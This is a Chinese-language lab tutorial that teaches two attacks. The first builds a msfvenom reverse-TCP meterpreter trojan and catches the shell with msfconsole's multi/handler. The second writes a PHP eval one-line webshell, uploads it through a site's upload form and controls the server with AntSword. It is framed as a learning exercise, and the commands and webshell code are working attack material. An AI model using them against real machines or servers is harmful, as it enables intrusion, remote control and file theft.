生成木马
一、简单知识介绍
msfveonm简单介绍:它是kali自带、Metasploit(MSF)框架里的木马生成工具(简单说专门制作各种系统的后门木马文件)
生成木马和一句话木马的区别:生成木马(需要执行触发、反向连接)是二进制/脚本型独立后门程序(用脚本语言写的、单独一个文件就能完整实现远程控制,不需要依赖网站、其他软件环境的后门文件)。一句话木马是web服务端代码片段(依赖Web容器解析、HTTP请求触发)。
二、实验操作
1、打开kali,进入终端
2、先用ifconfig查看自己的ip(后面命令要用到ip,这里是我这里的ip,要以实际ip为准)
3、输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=自己真实的攻击机的ip lport=任意写个1024~65535这间的端口 -f 生吃的类型 -o 生成的位置加名字
//这里介绍端口范围,端口数字是0~65535,0~1023是特权端口(系统自带服务占用),1024~65535是普通端口,可以随便选个用于反弹木马。
4、找到生成的木马,把木马拖到真实的电脑桌面
5、输入msfconsole进入
6、输入use exploit/multi/handler (这个使用的模块用于打开端口,等着木马主动连过来,没有它就接不到会话),然后再按照下面图片输入命令,lhost和lport要输入自己设置的,不要盲目按照主包的这个无脑敲
7、再双击桌面上的木马,就会像图二一样,这就是成功了
8、在输入shell,就能进入目标主机的c盘下(那么后面就能创建用户等等操作)
一句话木马
一、简单知识介绍
一句话木马:它是一种极简化的网页后门程序,俗称网页后门,通常写成<?php @eval($_POST[‘cmd’]);?>。它的原理是利用eval()函数,把收到的文本当成系统命令执行,再通过蚁剑发送命令就能操控服务器。它的作用是拿到网站服务器权限、上传下载文件、查看源码、执行系统命令、提权(指低权限普通账号,利用系统漏洞升级成最高管理员root权限)入侵整台服务器。
区分木马、病毒、漏洞:病毒是需依附宿主程序、具备自我复制能力的恶意代码。木马是伪装成合法软件、无自我复制能力但是可以远程控制的恶意程序。漏洞是系统硬件或策略中存在的缺陷,可被利用进行未授权访问或破坏。
二、实验操作
1、创建个文档,写个一句话木马
2、上传到含有上传功能的网页,将木马上传,复制路径
3、右键点击add将路径粘贴到蚁剑
测试连接,显示成功则再点击Add添加
显示添加成功
4、双击添加的连接配置记录可以查看目录(蚁剑点击Add添加的是WebShell连接配置记录。其本质是一条远程后门的连接配置,用来保存你要控制的目标网站后门信息。这个后门术语叫WebShell(一句话木马),双击这条添加好的记录,蚁剑就会通过网络和服务器上的WebShall建立通信通道,实现浏览、上传、删除网站服务器的所有文件等等。)